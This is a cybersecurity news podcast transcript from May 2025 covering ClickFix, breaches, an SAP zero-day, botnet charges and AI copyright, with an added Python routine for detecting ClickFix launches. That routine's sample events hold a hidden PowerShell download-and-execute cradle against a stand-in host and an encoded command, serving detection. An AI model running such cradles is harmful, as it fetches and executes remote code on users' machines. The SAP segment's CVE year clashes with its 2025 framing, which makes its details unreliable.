The CyberWire Daily Podcast 5.12.25
Ep 2306 | 5.12.25

No quick fix for a ClickFix attack.

Transcript

A major student engagement platform falls victim to the ClickFix social engineering attack. Google settles privacy allegations with Texas for over one point three billion dollars. Stores across the UK face empty shelves due to an ongoing cyberattack. Ascension Health reports that over 437,000 patients were affected by a third-party data breach. A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. U.S. prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, Senior Reporter from CyberScoop, discusses congressional reactions to White House budget cut proposals for CISA. Fair use faces limits in generative AI.


Today is Monday, May 12th, 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A major student engagement platform falls victim to the ClickFix social engineering attack. 

iClicker is a student engagement platform used by about 5,000 instructors and 7 million students at U.S. colleges, including major universities like Michigan and Florida. Between April 12 and 16, 2025, its website was compromised in a ClickFix social engineering attack. A fake CAPTCHA tricked visitors into running a malicious PowerShell script by copying it from the clipboard into the Windows Run dialog. Once executed, the script connected to a remote server to fetch more malware. Depending on the visitor, the attack either gave hackers full access or downloaded harmless software to avoid detection. The likely payload was an information stealer, targeting credentials, browser data, and cryptocurrency wallets. iClicker confirmed the breach on May 6, stating its apps and data were unaffected and the vulnerability had been fixed. The number of affected users is still unknown.
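Added here as an illustration, not code from the show or from iClicker: a small triage routine for the launch pattern described above, where a script pasted into the Run dialog appears as a shell host spawned by explorer.exe. It runs over constructed process-creation events; the Sysmon-style field names and the sample command lines are assumptions.

```python
import ntpath
import re

# Assumption (not the page's): events carry Sysmon-style ParentImage / Image / CommandLine fields.
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
CRADLE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b"
    r".*\|\s*(iex|invoke-expression)\b", re.I)  # fetch verb later piped into iex
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

def clickfix_indicators(event):
    """Return reasons this event looks like a ClickFix launch (empty list if none)."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"]
    # The Run dialog (Win+R) is hosted by explorer.exe, so a pasted script shows up as a
    # shell host parented by explorer.exe; a bare shell with no arguments is not flagged.
    if not (parent == "explorer.exe" and image in SHELL_HOSTS):
        return []
    reasons = []
    if HIDDEN.search(cmd):
        reasons.append("hidden window")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if CRADLE.search(cmd):
        reasons.append("download-and-execute cradle")
    return reasons

def triage(events):
    """Map event index -> indicators for every event that trips at least one."""
    found = {}
    for i, ev in enumerate(events):
        reasons = clickfix_indicators(ev)
        if reasons:
            found[i] = reasons
    return found

# Constructed sample events (not real telemetry); the -enc blob decodes to "IEX".
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -ep bypass -enc SQBFAFgA"},
]
```

Only the two explorer-parented PowerShell launches with a hidden window, an encoded command, or a download cradle are reported; the scheduled script and the notepad launch stay quiet.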

Google settles privacy allegations with Texas for over one point three billion dollars. 

Google will pay $1.375 billion to Texas to settle claims it secretly tracked users’ locations, private browsing activity, and biometric data without consent. The lawsuit, led by Attorney General Ken Paxton, alleged that Google continued tracking users even with location services off and used the data for advertising profits. It also claimed Google collected biometric data like facial geometry without proper consent. Google denies wrongdoing but has since updated its policies. The settlement is one of the largest U.S. privacy-related fines.

Stores across the UK face empty shelves due to an ongoing cyberattack. 

Co-op stores across the UK are facing empty shelves due to an ongoing cyberattack that began two weeks ago. Fearing hackers may still have access, the company has kept key logistics systems offline, severely disrupting deliveries. Staff report depot shipments are below 20% of normal, with meat, dairy, and eggs prioritized due to perishability laws. Other items like produce, canned goods, and cigarettes remain scarce. CEO Shirine Khoury-Haq confirmed customer and member data was compromised, though the nature of the hack is still unclear. Despite all stores remaining open, recovery is expected to take weeks. On the Scottish island of Islay, where Co-op is the only major grocer, special delivery processes are in place. Co-op, a member-owned co-operative, operates over 3,000 locations and does not have to report financial losses to public markets.

Ascension Health reports that over 437,000 patients were affected by a third-party data breach. 

Ascension Health reported that over 437,000 patients were affected by a data breach tied to a third-party vendor’s software vulnerability, not its own systems. Hackers exploited this flaw to steal sensitive data, including names, contact details, Social Security numbers, and health information. The breach likely stemmed from the Cl0p ransomware group’s December 2023 attack on Cleo’s file transfer platform. Impacted patients are being offered two years of free credit monitoring. This breach is smaller than Ascension’s May 2024 ransomware incident affecting 5.6 million.

A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. 

A critical zero-day vulnerability in SAP NetWeaver (CVE-2023-7629) is being actively exploited by Chinese state-sponsored hackers. The flaw, found in the Internet Communication Manager (ICM) component, allows unauthenticated remote code execution via crafted HTTP requests. Despite emergency patches, many SAP systems remain exposed. Attackers are targeting high-value sectors like finance and manufacturing to steal sensitive data and establish persistent access. Researchers found that the custom malware, dubbed “SAPphire,” uses encrypted communication over SAP protocols, making detection difficult. The attack chain begins with a malicious SOAP request that exploits memory corruption and delivers a reverse shell. From there, attackers modify SAP configurations to maintain access. The sophisticated campaign raises concerns about supply chain risks and has already caused operational disruptions across critical sectors including healthcare, government, and infrastructure.

Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. 

Varonis has uncovered two major cybersecurity threats targeting IT admins and cloud systems. First, attackers are using SEO poisoning to trick admins into downloading malware disguised as legitimate tools. These fake downloads can install backdoors like SMOKEDHAM or monitoring software, enabling credential theft and data exfiltration. In one case, nearly a terabyte of data was stolen, followed by a ransomware attack. Separately, Varonis found a critical root access flaw in Azure’s AZNFS-mount utility, used in HPC and AI workloads. The bug, present in versions up to 2.0.10, lets unprivileged users escalate to root by exploiting environment variables. Though Microsoft rated it low severity, the risk of full cloud compromise is significant. Varonis urges immediate patching to version 2.0.11 and recommends a Defense in Depth strategy to reduce exposure.

U.S. prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. 

U.S. prosecutors have charged three Russians and one Kazakhstani in connection with the takedown of two major botnets, Anyproxy and 5socks. The suspects allegedly ran a malware campaign that hijacked outdated wireless routers, converting them into proxy servers for rent on the seized websites. The botnets offered over 7,000 proxies, generating $46 million over 20 years. The operation, named “Moonlander,” involved international cooperation and technical analysis from Lumen Technologies. Many infected routers were found in Oklahoma, with global reach across 80+ countries. The FBI warns that outdated routers, especially older Linksys, Cisco, and TP-Link models, are prime targets for exploitation by threat actors, including Chinese hackers. Two defendants also face charges for using false identities to register domains. Authorities urge replacing unsupported routers to avoid similar compromises.

A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. 

A new tool called Defendnot disables Microsoft Defender by exploiting the Windows Security Center (WSC) API, tricking Windows into thinking a legitimate antivirus is installed. Created by GitHub developer “es3n1n,” Defendnot registers a fake antivirus product using reverse-engineered interactions with the undocumented WSC API, bypassing Microsoft’s integrity checks by injecting its code into trusted processes like Task Manager. Once registered, Windows automatically disables Defender to avoid conflicts. While the tool requires admin privileges and persistent installation to survive reboots, it poses a risk if abused by malware developers. Security experts warn that although Defendnot showcases impressive technical skill, it highlights a significant security gap in how Windows handles AV product registration. The tool builds on the developer’s earlier project, no-defender, and underscores the need for better safeguards in WSC’s architecture.

Next up, I welcome back Tim Starks, Senior Reporter from CyberScoop, discussing congressional reactions to White House budget cut proposals for CISA.

We’ll be right back.

Welcome back. You can find links to the articles Tim and I discussed in the show notes. 

Fair use faces limits in generative AI. 

Late last Friday, in a move as quietly timed as it was politically charged, the U.S. Copyright Office released a pre-publication version of Part 3 of its AI study—just hours before its top leadership was abruptly dismissed. The 108-page report tackles how copyright law, especially fair use, should apply to AI training. It argues that copying during training is presumptively infringing, and that even the model’s weights may embed protected expression. The report emphasizes that fair use hinges on how the AI is ultimately used, not just how it’s trained. Particularly striking is the Office’s endorsement of a novel “market dilution” theory, warning that AI-generated content could flood and devalue markets—even without direct copying. While courts are not bound by the report, its detailed reasoning could shape the 40+ ongoing copyright cases involving generative AI. Whether the report survives changing political winds remains uncertain—but its legal implications are already rippling outward.
And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

Don’t forget to check out the “Grumpy Old Geeks” podcast, where I contribute to a regular segment on Jason and Brian’s show every week. You can find “Grumpy Old Geeks” where all the fine podcasts are listed.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.